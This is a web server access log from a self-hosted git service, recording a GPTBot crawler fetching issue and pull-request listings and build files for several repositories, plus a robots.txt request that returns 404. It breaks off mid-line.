-[17/Feb/2026:19:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:19:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=open&type=all" -[17/Feb/2026:19:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:19:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:19:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:11:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" -[17/Feb/2026:19:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:11:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastupdate&state=all&type=all" -[17/Feb/2026:19:11:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:11:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 12093] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin?display=rendered" [Client 74.7.227.38] [Length 11280] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:19:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:12 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" -[17/Feb/2026:19:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15664] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:11:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15665] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15662] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15668] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15663] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=source" [Client 74.7.227.38] [Length 15664] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:19:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:19:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:11:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] 